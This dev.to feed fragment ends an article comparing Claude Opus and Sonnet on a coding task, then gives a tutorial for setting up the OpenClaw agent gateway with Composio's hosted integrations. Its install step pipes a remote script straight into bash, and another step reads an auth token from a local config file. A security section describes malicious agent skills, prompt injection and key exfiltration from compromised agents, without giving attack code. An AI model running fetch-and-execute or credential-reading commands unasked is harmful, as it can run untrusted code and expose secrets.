&lt;p&gt;Just like Opus, it ran into a test failure during the run. This is one of those things you’ll notice with similar models: same prompt, same codebase, and they sometimes hit the exact same weird issue.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4m06o4om4xy8h0n9avap.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4m06o4om4xy8h0n9avap.png" alt="Claude Sonnet 4.6 project build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s the demo of the CLI. You’ll see it mostly working, but there are some rough edges, and it’s not as well implemented as Opus’s:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/A_4ZiT30pGs"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;...and how it integrates with Tensorlake:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/kzzzrobQ15I"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;As you can see, it's not working. Sonnet did attempt a fix, but still couldn't get the Tensorlake integration to a working state. Overall, though, it was super close.&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://github.com/tensorlakeai/tensorlake-website/tree/main/research-pack-sonnet" rel="noopener noreferrer"&gt;Sonnet 4.6 Patch&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$0.87&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Same as Opus 4.6, this is an approximate cost based on the input/output tokens.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 33 minutes 48 seconds + ~3m 18s for the attempted fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 52.9K + ~5K for the fix (didn't work)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 88 files changed, 23253 insertions(+)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;🤷‍♂️ I can’t really complain about Sonnet’s performance, other than this one issue. It still got almost everything working. And to be fair, Sonnet isn’t Anthropic’s flagship coding model like Opus. It’s more of a general-purpose model, and Opus also comes with a pretty big cost difference, so the gap in code quality is kind of expected.&lt;/p&gt;

&lt;p&gt;And please don’t try using the API keys shown in the video, as they’ve already been revoked.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Opus as a lineup is just too good. If you want an end-to-end product that works most of the time with minimal hand-holding, go with Opus. If you want something cheaper, and you’re okay finishing the last bit yourself, Sonnet is still solid.&lt;/p&gt;

&lt;p&gt;Even in this one test, you can already see the gap in implementation quality, token usage, and time spent.&lt;/p&gt;

&lt;p&gt;And if Anthropic can cut Opus to half its price, or even get it close to Sonnet’s, it’d be over for most other models.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxjd3t2007csw2j79ko0e.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxjd3t2007csw2j79ko0e.gif" alt="Shocked GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For me, the best way to use these models is still the same: let them build most of it fast, then run it, test it, and clean up the rough parts yourself.&lt;/p&gt;

&lt;p&gt;Let me know your thoughts in the comments. ✌️&lt;/p&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>python</category>
      <category>productivity</category>
    </item>
    <item>
      <title>How to set up Secure OpenClaw and power it with 850+ SaaS Apps 🦞🔒</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 05 Mar 2026 13:26:54 +0000</pubDate>
      <link>https://dev.to/composiodev/how-to-set-up-secure-openclaw-and-power-it-with-850-saas-apps-5d5j</link>
      <guid>https://dev.to/composiodev/how-to-set-up-secure-openclaw-and-power-it-with-850-saas-apps-5d5j</guid>
      <description>&lt;p&gt;OpenClaw has been showing up in my feed way too much, so I finally sat down and tested it properly, and yeah, it comes with a few real problems.&lt;/p&gt;

&lt;p&gt;In this post, I’ll cover what OpenClaw is, how to set it up, where the security risks really come from, and how to use &lt;strong&gt;safer remote integrations&lt;/strong&gt; so you can make it a bit more secure and save yourself some stress.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zoa277kk0pcvkygsv18.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zoa277kk0pcvkygsv18.png" alt="OpenClaw banter on the internet" width="800" height="416"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the takeaway, here’s the deal with OpenClaw:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OpenClaw is a local agent gateway.&lt;/strong&gt; It is the layer that connects your LLM (OpenAI, Anthropic, etc.) to real tools and local execution.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The “special sauce” is the package.&lt;/strong&gt; People like it because it ships as a usable bundle: built-in skills, a simple “agent brain” file (&lt;code&gt;SOUL.md&lt;/code&gt;), and easy chat support like messenger integrations.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Security is the big problem.&lt;/strong&gt; By design, it can touch files, run commands, and pull third-party skills. The least-bad way to use it is with &lt;strong&gt;remote, sandboxed integrations&lt;/strong&gt; (which I’ve shown how to set up).&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Also, watch your token bill.&lt;/strong&gt; It can be very inefficient and chew through credits fast, especially if you’re using hosted models instead of a local LLM.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Overall, you'll learn everything you need to understand and get started with OpenClaw (and make it slightly safer with secure integrations).&lt;/p&gt;




&lt;h2&gt;
  
  
  What's OpenClaw?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs0cgc950ax7jj589gh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs0cgc950ax7jj589gh.png" alt="OpenClaw GitHub banner" width="800" height="289"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenClaw is a personal AI assistant you run on your own machine (or a server you own). It is not a new model. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations.&lt;/p&gt;

&lt;p&gt;Take this as a mental model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your LLM is the brain (thinks)&lt;/li&gt;
&lt;li&gt;OpenClaw is the body (it can do things)&lt;/li&gt;
&lt;li&gt;The Gateway is the receptionist (routes messages in and results out)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So when people say “OpenClaw turns an LLM into an agent,” what they really mean is: it gives the model a runtime that can call tools, keep state, and show up where you already chat (WhatsApp, Telegram, Slack, Discord, etc.).&lt;/p&gt;

&lt;p&gt;Now, that's just the gist. There's a lot more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Febm07htbjdxc0m1aqlnm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Febm07htbjdxc0m1aqlnm.png" alt="OpenClaw anatomy" width="800" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What's Special Compared to Something like Manus? 🤔
&lt;/h3&gt;

&lt;p&gt;Manus is essentially "agent as a product," but you're limited to their UI, tools, rules, and cloud.&lt;/p&gt;

&lt;p&gt;OpenClaw is more like “agent as a kit.” It’s meant to be installed, set up, and shaped around your &lt;strong&gt;own workflow&lt;/strong&gt;. You decide what models it uses, what tools it can touch, what data it can access, and where it runs.&lt;/p&gt;

&lt;p&gt;That's the biggest difference.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 "Manus is for convenience, and OpenClaw is for control."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Wow, that was a nice line I came up with on the fly. 😂&lt;/p&gt;




&lt;h2&gt;
  
  
  OpenClaw Installation
&lt;/h2&gt;

&lt;p&gt;You’ve got two clean ways to install OpenClaw. If you just want it running quickly, do the normal installation. If you’re even slightly paranoid (which you should be 😮‍💨), do Docker.&lt;/p&gt;

&lt;p&gt;The core requirement is &lt;strong&gt;Node ≥ 22&lt;/strong&gt;.&lt;/p&gt;
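&lt;p&gt;Before installing, it’s worth a quick preflight check that your Node version actually meets that requirement. A small sketch:&lt;/p&gt;

```shell
# Preflight check for the Node >= 22 requirement before running the installer.
if command -v node >/dev/null 2>&1; then
  # strip the leading "v" and everything after the major version number
  major=$(node -v | sed 's/^v\([0-9][0-9]*\).*/\1/')
  if [ "$major" -ge 22 ]; then
    echo "Node $major: OK"
  else
    echo "Node $major: too old, upgrade to 22+ first"
  fi
else
  echo "node not found: install Node 22+ first"
fi
```

&lt;p&gt;If you’re on an older Node, upgrade before running the install script rather than debugging a half-finished install afterwards.&lt;/p&gt;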

&lt;h3&gt;
  
  
  Option 1: Normal install (recommended for most people)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Prereqs:&lt;/strong&gt; Node 22+ and an API key (OpenAI, Anthropic, OpenRouter, whatever you’re using).&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Install OpenClaw:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-fsSL&lt;/span&gt; https://openclaw.ai/install.sh | bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="2"&gt;
&lt;li&gt;Run onboarding (this sets up provider auth + gateway settings and can install the background service):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw onboard &lt;span class="nt"&gt;--install-daemon&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="3"&gt;
&lt;li&gt;Check the gateway status (if you installed the service, it should already be running):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw gateway status
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="4"&gt;
&lt;li&gt;
&lt;strong&gt;Optional:&lt;/strong&gt; Open the Control UI:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw dashboard
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Option 2: Docker (more isolated and secure)
&lt;/h3&gt;

&lt;p&gt;Docker is great when you want a throwaway environment or isolation from your host, but it introduces an important rule:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Containers only see plugins and config if they share the same OpenClaw state directory/volume. So, it comes with a little complexity.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ol&gt;
&lt;li&gt;Clone and start the Docker stack:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/openclaw/openclaw
&lt;span class="nb"&gt;cd &lt;/span&gt;openclaw
./docker-setup.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡 To know more about how/what it does, visit the &lt;a href="https://docs.openclaw.ai/install/docker#quick-start-recommended" rel="noopener noreferrer"&gt;OpenClaw Docker Quickstart&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Control UI gotchas
&lt;/h2&gt;

&lt;p&gt;If you open the Control UI, and it shows something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;unauthorized: gateway token missing&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That's normal. The UI needs a gateway token to connect.&lt;/p&gt;

&lt;p&gt;Get your token:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; ~/.openclaw/openclaw.json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.gateway.auth.token'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Make sure &lt;code&gt;jq&lt;/code&gt; is installed on your machine. Or, you can manually get the token from the config file &lt;code&gt;~/.openclaw/openclaw.json&lt;/code&gt;.&lt;/p&gt;
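&lt;p&gt;If you’d rather not install &lt;code&gt;jq&lt;/code&gt;, a &lt;code&gt;sed&lt;/code&gt; one-liner can pull the token out too. It’s shown here against a minimal sample config (the JSON shape is assumed from the &lt;code&gt;jq&lt;/code&gt; path above); point it at &lt;code&gt;~/.openclaw/openclaw.json&lt;/code&gt; in real use:&lt;/p&gt;

```shell
# jq-free fallback: extract the gateway token with sed.
# Demonstrated on a sample file; in real use, target ~/.openclaw/openclaw.json.
cat > /tmp/openclaw-sample.json <<'EOF'
{ "gateway": { "auth": { "token": "oc_example_token" } } }
EOF
# capture whatever sits between the quotes after "token":
sed -n 's/.*"token"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' /tmp/openclaw-sample.json
```

&lt;p&gt;This is a quick hack for a flat lookup; for anything beyond grabbing one field, &lt;code&gt;jq&lt;/code&gt; is the saner tool.&lt;/p&gt;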

&lt;p&gt;Then either:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Paste it in the UI (Overview → Gateway Access → Gateway Token)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhiyeoiocmm7wwvkm22z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhiyeoiocmm7wwvkm22z.png" alt="OpenClaw control UI" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use a URL that includes it, for example via:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw dashboard &lt;span class="nt"&gt;--no-open&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgbfknrusautve6n1wu3e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgbfknrusautve6n1wu3e.png" alt="OpenClaw URL with a token" width="800" height="245"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  OpenClaw is bad for Security
&lt;/h2&gt;

&lt;p&gt;OpenClaw’s whole selling point is also the problem: it can read/write files, run shell commands, and load third-party “skills.” That is basically “download random code from the internet and run it with your permissions,” except now an LLM is the one executing.&lt;/p&gt;

&lt;p&gt;What’s actually gone wrong in the wild (already):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Malicious skills on ClawHub:&lt;/strong&gt; researchers found hundreds to thousands of skills that were straight up malware or had critical issues, including credential theft and prompt injection patterns.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Prompt injection turning into installs:&lt;/strong&gt; there’s been at least one high profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exfiltrating API keys and tokens:&lt;/strong&gt; when your agent has full control of the computer and gets compromised, it can easily exfiltrate your API keys and tokens to attackers.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwt4rsqu3wykpix72papj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwt4rsqu3wykpix72papj.png" alt="OpenClaw security flaws blog post discussion" width="800" height="379"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you’re still going to run it, do the bare minimum to not get cooked:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Don't trust skills you don't know. If you didn’t read it, don’t install it.&lt;/li&gt;
&lt;li&gt;Prefer OAuth-hosted integrations over pasting keys locally.&lt;/li&gt;
&lt;li&gt;Run it sandboxed (Docker) and keep it away from your real home directory.&lt;/li&gt;
&lt;/ul&gt;
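&lt;p&gt;For the last point, one simple pattern is to give OpenClaw a dedicated state directory and mount only that into the container, so nothing else under your home directory is exposed. A sketch (the image name and mount path are illustrative, not official):&lt;/p&gt;

```shell
# Keep OpenClaw's state in one dedicated directory instead of letting it
# roam your real home directory. Paths and image name are illustrative.
STATE_DIR="${OPENCLAW_STATE_DIR:-$HOME/sandboxes/openclaw-state}"
mkdir -p "$STATE_DIR"
echo "state dir ready: $STATE_DIR"
# Then mount only that directory into the container, nothing else from $HOME:
# docker run -v "$STATE_DIR:/root/.openclaw" your-openclaw-image
```

&lt;p&gt;The point is the blast radius: if the agent goes rogue inside the container, the only host files it can touch are the ones in that single mounted directory.&lt;/p&gt;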

&lt;p&gt;If you want to read more on OpenClaw’s security posture, we have a nice piece on it: &lt;a href="https://composio.dev/blog/openclaw-security-and-vulnerabilities" rel="noopener noreferrer"&gt;OpenClaw is a Security Nightmare Dressed Up as a Daydream&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Setting up safe Integrations
&lt;/h2&gt;

&lt;p&gt;So enough of that. Let's look into how you can make it a bit more secure.&lt;/p&gt;

&lt;p&gt;I assume you already have OpenClaw installed and have finished the initial onboarding. We’ll use the Composio plugin, which gives us access to 850+ SaaS apps like Gmail, Outlook, Canva, YouTube, Twitter, and more, without you needing to manage OAuth tokens and integrations yourself.&lt;/p&gt;

&lt;p&gt;Unlike OpenClaw’s native integrations, the credentials never stay on your system, so even a compromised OpenClaw instance can’t access them. The credentials are securely hosted and managed by Composio.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Install Composio Plugin
&lt;/h3&gt;

&lt;p&gt;Composio’s OpenClaw plugin connects OpenClaw to Composio’s MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer without you needing to handle auth hassles.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins &lt;span class="nb"&gt;install&lt;/span&gt; @composio/openclaw-plugin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2. Composio Plugin Setup
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Log in at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Choose OpenClaw as the client.&lt;/li&gt;
&lt;li&gt;Copy your consumer key (&lt;code&gt;ck_...&lt;/code&gt;) from the Composio dashboard settings, then set it:&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftq7iwaghb2x4qh7r45nz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftq7iwaghb2x4qh7r45nz.png" alt="Composio Consumer Key generation" width="800" height="213"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw config &lt;span class="nb"&gt;set &lt;/span&gt;plugins.entries.composio.config.consumerKey &lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
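&lt;p&gt;As a quick sanity check before setting it, consumer keys from the dashboard start with &lt;code&gt;ck_&lt;/code&gt;. Here's a purely illustrative snippet (the key value is a placeholder, not a real key):&lt;/p&gt;

```shell
# Hypothetical sanity check: Composio consumer keys start with "ck_"
key="ck_your_key_here"   # placeholder, not a real key

case "$key" in
  ck_*) echo "key format looks right" ;;
  *)    echo "unexpected key format" ;;
esac
```

If the echo says the format looks wrong, you most likely copied the wrong value from the dashboard settings.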



&lt;h3&gt;
  
  
  3. Verify the plugin loaded
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins list
openclaw logs &lt;span class="nt"&gt;--follow&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You're looking for something like "Composio loaded" and a "tools registered" message.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpsvm2sy8geqomwkr1ri.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpsvm2sy8geqomwkr1ri.png" alt="OpenClaw loading Composio plugins" width="800" height="219"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If the plugin shows as &lt;strong&gt;"loaded"&lt;/strong&gt;, you can now successfully access Composio.&lt;/p&gt;

&lt;p&gt;Here's how it works:&lt;/p&gt;

&lt;p&gt;The plugin connects to Composio's MCP server at &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt; and registers all available tools directly into the OpenClaw agent. Tools are called by name. No extra search or execute steps needed.&lt;/p&gt;

&lt;p&gt;If a tool returns an auth error, the agent will prompt you to connect that toolkit at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's how the configuration looks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"plugins"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"entries"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"composio"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"consumerKey"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can configure the following options directly from the config file:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;enabled&lt;/code&gt;: enable or disable the plugin&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;consumerKey&lt;/code&gt;: your Composio consumer key&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;mcpUrl&lt;/code&gt;: the MCP server URL. By default, it's &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
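&lt;p&gt;To see how these options map onto the JSON above, here's a minimal sketch (assumes &lt;code&gt;jq&lt;/code&gt; is installed; the file path is made up for illustration and is not OpenClaw's real config location):&lt;/p&gt;

```shell
# Write a sample config snippet to a scratch path (illustrative only)
cat > /tmp/openclaw-composio.json <<'EOF'
{
  "plugins": {
    "entries": {
      "composio": {
        "enabled": true,
        "config": { "consumerKey": "ck_your_key_here" }
      }
    }
  }
}
EOF

# Confirm the key sits at the path the plugin expects
jq -r '.plugins.entries.composio.config.consumerKey' /tmp/openclaw-composio.json
# → ck_your_key_here
```

The `jq` path mirrors the dotted key used by `openclaw config set` earlier: `plugins.entries.composio.config.consumerKey`.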

&lt;p&gt;Previously, you had to configure API keys per integration, but with Composio you don't have to worry about any of that. Just make sure &lt;strong&gt;not to leak&lt;/strong&gt; the consumer key we generated.&lt;/p&gt;

&lt;p&gt;And it's that simple. Everything works out of the box, just like any other OpenClaw plugin!&lt;/p&gt;

&lt;p&gt;Now, to test if it works, head over to the Control UI chat and send a message, something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;“List the Composio tools you have available. Only print the result here”&lt;/p&gt;
&lt;/blockquote&gt;

